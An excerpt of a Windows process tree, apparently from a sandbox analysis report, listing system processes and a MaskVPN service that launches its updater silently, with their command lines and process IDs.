C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\a83f937a1363461bb830b56dccd394d8 /t 3272 /p 72241⤵PID:7824
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5136
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:4780
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:7284
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:8684
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:8480
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5704